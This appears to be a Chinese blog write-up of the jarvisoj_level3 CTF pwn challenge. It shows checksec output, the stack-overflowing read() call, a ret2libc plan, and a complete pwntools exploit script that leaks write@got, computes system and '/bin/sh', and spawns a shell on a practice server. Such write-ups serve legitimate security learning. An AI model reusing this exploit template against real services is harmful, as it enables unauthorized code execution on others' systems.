加载头像

jarvisoj_level3

Ubuntu 16 来源:https://github.com/bash-c/pwn_repo


0x01


checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/jarvisoj_level3/level3'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x8048000)

IDA

vulnerable_function()

1
2
3
4
5
6
7
ssize_t vulnerable_function()
{
char buf[136]; // [esp+0h] [ebp-88h] BYREF

write(1, "Input:\n", 7u);
return read(0, buf, 0x100u); //read()函数存在栈溢出漏洞
}

//无system

0x02


思路 ret2libc

1.栈溢出泄露write_got

2.利用LibcSearcher计算出system()和str_bin_sh

3.再次溢出执行system()

s 0x88
rbp 0x4
ret write()
write_ret main()
arg write_plt
s 0x88
rbp 0x4
ret system()
sys_ret 0xdeadbeef
arg /bin/sh

0x03


exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *
from LibcSearcher import *

context(log_level='debug', os='linux', arch='i386')
io = remote('node4.buuoj.cn', 25172)
# io = remote('pwn2.jarvisoj.com', 9879)
# io = process(["./level3"])
elf = ELF("./level3")

padding = 0x88 + 0x4
write_plt = elf.plt['write']
write_got = elf.got['write']
main = 0x8048484
delims = b'Input:\n'
payload = flat(b'a' * padding, write_plt, main, 1, write_got, 0x4)
io.sendlineafter(delims, payload)

write_addr = u32(io.recv(4))
print('[+] write_address -->', hex(write_addr))

# libc = LibcSearcher('write', write_addr)
# libc_base = write_addr - libc.dump('write')
# system = libc_base + libc.dump('system')
# bin_sh = libc_base + libc.dump('str_bin_sh')
# libc6_2.19-0ubuntu6.15_i386
libc = ELF('./libc-2.23.so')
libc_base = write_addr - libc.symbols['write']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + libc.search(b'/bin/sh\x00').__next__()
print('[+] libc_base -->', hex(libc_base))
print('[+] system_address -->', hex(system))
print('[+] bin_sh -->', hex(bin_sh))

payload = flat(b'a' * padding, system, 0, bin_sh)
io.sendlineafter(delims, payload)
io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體